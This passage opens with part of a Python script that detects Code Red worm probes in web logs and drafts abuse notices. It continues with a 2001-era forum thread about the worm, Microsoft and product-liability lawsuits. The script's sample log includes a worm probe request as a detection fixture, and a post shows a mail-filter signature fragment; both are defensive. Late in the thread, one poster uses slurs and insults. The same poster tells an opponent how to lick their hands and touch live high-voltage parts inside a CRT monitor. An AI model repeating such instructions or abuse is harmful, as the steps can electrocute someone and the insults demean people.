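    '192.0.2.44 - - [05/Aug/2001:03:19:55 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 288',
    'this line is deliberately unparseable',
]


def classify(path):
    """Return 'CodeRed', 'CodeRedII' or None for a request path."""
    m = CODERED_RE.match(path)
    if not m:
        return None
    return "CodeRedII" if m.group("fill") == "X" else "CodeRed"


def scan_log(lines):
    """Count worm probes per source IP and record which variant(s) each sent."""
    hits = Counter()
    variants = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        variant = classify(m.group("path"))
        if variant is None:
            continue  # ordinary traffic
        ip = m.group("ip")
        hits[ip] += 1
        variants[ip].add(variant)
    return hits, dict(variants)


def summary(hits):
    """The 'N hits (M unique addresses)' figures people quote in the thread."""
    return {"hits": sum(hits.values()), "unique": len(hits)}


def draft_notice(ip, count, variants, domain, our_host="www.example.org"):
    """Plain-text notification for postmaster@<domain>. The domain is assumed
    to come from the deployer's own MX/reverse lookup of `ip`; delivery is
    not handled here."""
    names = ", ".join(sorted(variants))
    return (
        f"To: postmaster@{domain}\n"
        f"Subject: Host {ip} appears infected with {names}\n\n"
        f"Your host {ip} sent {count} request(s) for /default.ida to {our_host}, "
        f"the probe used by the {names} worm. The machine is running an "
        f"unpatched IIS server and should be patched and cleaned."
    )


if __name__ == "__main__":
    hits, variants = scan_log(SAMPLE_LOG)
    print(summary(hits))
    for ip, n in hits.most_common():
        # "example.net" stands in for the domain an MX lookup would return.
        print(draft_notice(ip, n, variants[ip], "example.net"), end="\n\n")
```

Feeding it a real log means `scan_log(open("/var/log/apache/access_log"))`; the parser tolerates junk lines, and only requests that carry the worm's filler are counted, so legitimate 404s do not inflate the tally.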
Microsoft's products spew pollution into the information space like a burning mountain of tires.
For sure! Take a look at my webserver (which pioneers the great new feature of a "Log File Chat Room" (tm 2001 Lawrence Wade)).
This new variant seems to have been especially active, it's eating up a lot of my bandwidth. Last time, my IP address wasn't getting scanned as much as many other people I spoke with; I'm wondering if this one includes a better random number seed. I'm also seeing IIS victims from my ISP.
Also, I wonder if a disclaimer stating that infected IIS servers are not allowed to visit my website would be sufficient to work towards suing Microsoft for their ongoing gross negligence and complicity causing material and financial damage.
Fire and Meat. Yummy.
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6H
Okay. Forgive me if the syntax is off, I've never had to play with procmail filters. But it strikes me that this one would be significantly more useful:
* X-mailer=Outlook
:)
Fire and Meat. Yummy.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
Yelling, "There should be a law!" just makes you look like a dumb liberal that needs the government to protect him from himself.
For sure, and such a law would stifle innovation far more than Microsoft has. Imagine the liability in releasing a beta (or... gasp! an alpha) version?
Now, I think there have to be other ways to go after Microsloth, more than legislation. What's needed is a judge - perhaps one as braindead as the one who awarded millions to the dumb woman who spilled coffee on her lap - who can be used to our advantage in a class-action lawsuit from all victims of the default-dangerous Microsoft machines in the field.
Fire and Meat. Yummy.
The McDonald's coffee case judge was not braindead. Get the facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature.
You're kidding, right? I think you are, but I'm not sure. Okay. Well, I'll treat my response as if you're serious.
I worked at a McDonalds, aeons ago, when I was in high school. Like, 1991. Probably when you were still in kindergarten.
I worked there for four years. My first year, it was hell, I was minimum wage scum, but McDonalds is like the army: you get out of it exactly what you put into it.
Well, I was nice with everyone, and I always arrived on time, and I always worked hard. And I was quickly awarded Employee of the Month. Less than a week after that, I was asked to come in for a staff meeting. I thought I was in trouble for something. All the managers sat me down very seriously, and asked me if I knew why I was there. They passed me a package and told me to sign for its receipt. I did, then I opened the package. It was a manager's uniform with my name on the little gold tag.
I got to know a lot about McDonalds and its customers in the 3 years that followed. It was, believe it or not, a great job and I made a lot of friends working at McDonalds with whom I'm still in touch.
As a part time ("Swing") manager, I got to help ensure that the restaurant ran smoothly. Ordering supplies, ensuring the staff have everything they need, resolving conflicts, assuring quality control, and dealing with customer complaints.
One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.
Now, of course, since some slovenly white trash got rich because of her own stupidity, I'm sure the customer complaints about cold coffee are even more common. From what I understand, the coffee is to be kept at 73C now.
Of course it's hot. Coffee is supposed to be hot. Next thing is people will start suing over Eskimo Pie migraines they get when they drink their cold Coke too quickly.
GM recently got sued for several billion dollars. It was Christmas Eve in about 1995 when this tragedy occurred. A family was riding along in their 1978 Chevy Malibu (already an old car). They were stopped at a red light, and a drunk driver hit them from behind. The car's gas tank exploded, and while the family were all conscious and relatively unhurt, when they got out, one of the kids had third degree burns to his leg. So they sued GM for faulty fuel tank design.
Now, one thing about this case that terrifies me is that this was a 17-year-old car at the time of the accident. Who knows what nature of wear had been experienced? Rusted out gas tank? For all we know, this car shouldn't have been on the road to begin with.
The other thing that terrifies me is that the jury wasn't allowed to hear how fast the vehicle that rear-ended them was travelling. Remember, they were stopped at a traffic light. They were hit by a drunk driver in a full-size pickup truck travelling at 75MPH. Approximately 120km/h.
Changes things a little, doesn't it? How survivable is that accident?
Rather than suing GM because a 17 year old car blew up when it was rear-ended by a 4,000lb mass travelling at 75MPH, I think I'd be writing a letter to GM to thank them for the fact that despite such a horrific accident, I still had both my kids.
Your remark suggests a tacit support of the excessive litigation against businesses. My wish upon you is that you mortgage your house, open a business, and get sued by someone who gets a paper cut off your first invoice.
Fire and Meat. Yummy.
A disproportionate number of the hits on my (Australian) web servers [sources] are from Asian countries, leading me to suspect that perhaps the non-English versions of the patch and/or some of the prerequisite Service Packs were released late and/or not as well publicised.
If I was forced to ride shotgun on one of these security sieves, I'd be checking for patches twice daily. And I'd have the sucker behind a non-M$ reverse proxy.
Got time? Spend some of it coding or testing
Not so easy, the right service packs appear to be required first. So your little proggie would first have to determine what was needed, second download and install it all, then finally clean off the rootshell.
Got time? Spend some of it coding or testing
I don't care what temperature you set it to when YOU worked at McDonald's, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.
Yeah. So, she's apparently not intelligent enough to be trusted with coffee, or tea, or hot chocolate... I'd also draw the line at giving her a driver's license. In fact, I'd legislate that people like her should have to wear helmets everywhere they go.
I can't drink coffee at 73C, let alone 85C. But I also know that at 85C, people complain that the coffee is too cold. Those are the edicts from McDonalds, not the temperature at which I independently chose to set the Bunn's thermostat.
So? I carefully put my coffee aside and let it cool.
As for the third degree burns, you can get third degree burns from something that is a mere 50C. Note that is the temperature to which most hot water heaters are set. Are you therefore a proponent of a law requiring everyone to turn down their hot water heaters to 37C so that they can't burn people? Heck, there are lots of other things that can burn you. If you're stupid, take the back cover off your monitor. Right at the back of the picture tube's neck, you'll find that there is an area of glass heated by radiant heat leaving the cathodes. Rest your finger there and see how many yucks you have. Let's ban monitors because they can hurt people. Let's ban stoves because a child could turn on a burner and scorch himself. Let's ban cars because the radiator gets warm. Of course, we can't let people have bicycles, either, there are many ways to get hurt on *those*, least of which being the elevated temperature of the brake pads after stopping.
You, sir, like the bovine hausfrau who was too stupid to ensure that her coffee didn't spill on her lap, are the idiot. If I were President, I'd find you and your peers a nice little padded cell somewhere so that you may avoid any sort of risk or personal responsibility for your activities.
And, PS. While you're in the monitor, look for the big coils of wire around the funnel of the tube. Okay. Find the wires that go to the area of the big plastic block and the big red wire that goes to the suction cup on the back of the tube. Now, this is very important... turn on the monitor and lick your hands. Touch the sheetmetal shielding inside the monitor with your left hand. With your right hand, simultaneously touch the solder connection where the horizontal deflection voltage leaves the PC board (near the big plastic box, remember). Feeling warm yet? If your skin isn't on fire within a few seconds, you didn't follow the instructions right.
Fire and Meat. Yummy.
If your coffee is too hot, add an ice cube or let it cool off. If your coffee is too cold, you curse McDonalds for making cold coffee. Coffee is supposed to be hot. Most domestic coffee brewers percolate boiling water up; the steam condenses and drips into the filter basket, and enters the pot at a temperature very close to boiling. No one sues Mr. Coffee or Black and Decker.
Anyhow, as you simultaneously manage to frustrate and bore me, this thread is now extinct. Maybe once you can shave daily and manage to become remotely cosmopolitan, your perspective will adjust somewhat.
Fire and Meat. Yummy.